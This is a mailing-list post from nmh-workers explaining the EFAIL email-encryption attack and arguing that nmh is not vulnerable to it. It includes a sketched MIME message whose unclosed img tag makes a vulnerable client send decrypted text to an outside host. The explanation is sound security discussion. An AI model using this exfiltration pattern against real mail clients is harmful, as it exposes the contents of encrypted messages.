Re: [nmh-workers] post 1.71 ug: "long line"/single newline paragraphs

[Ken Hornstein]

>Michael Richardson writes:
>> And given EFAIL, it seems that we were wise.
>
>nmh wise? I dunno. Part of EFAIL was that the mail client downloaded
>bits from the Internet and interleaved them seamlessly into the message.
>That seems like an inherently dangerous thing to do... and nmh does it
>with one of the messages in this very thread: Ralph Corderoy's message
>contains a 'Content-Type: message/external-body; access-type="url";
>url="..."' bit that was promptly fetched and displayed in the middle of
>the message. How do I disable this behavior, and why does nmh have it
>turned ON by default!?

Respectfully ... the vulnerability with EFAIL was NOT that people downloaded
stuff via HTTP.  Kind of the exact opposite, actually ... MUAs were given
a previously-encrypted message and tricked into decrypting it and uploading
it by stitching together HTML content across multiple MIME parts.  E.g.:

--BOUNDARY
Content-Type: text/html

<img src="http://efail.de/
--BOUNDARY
Content-Type: application/pkcs7-mime; [...]
Content-Transfer-Encoding: bae64

[... message attacker wants to decrypt ...]
--BOUNDARY
">
--BOUNDARY--

A poorly-written MUA would decrypt the message and then "fetch" the
image because they would interpret all of the HTML parts as one
continuous HTML content (notice the opening quote in the first HTML
part does not contain a closing quote), and the URL would contain the
decrypted text the attacker is interested in (presumably they got that
via some other mechanism).  And it turns out there are a lot of poorly-
written MUAs!

I looked at this when it came out; I do not believe that even if we
supported S/MIME or OpenPGP natively we would be vulnerable to EFAIL,
because we pass each HTML part to it's own HTML converter, so there is
no HTML "state" that would be preserved across multipart boundaries.
And even if it was an issue, they default HTML-to-text converters
we use do not fetch images.

To the larger point ... I do not think there is any fundamental
difference between being emailed a text/plain part and fetching it via
HTTP; they both are coming across the wild Internet, and I think this
applies to any content.  The only possible disadvantage I can think of
is that it would evade a virus checker than runs on your mail server,
but since relatively few MUAs support message/external-body messages now
I suspect it's highly unlikely that anyone would choose to distribute a
virus in this way.  I am open to being proven wrong, of course.

--Ken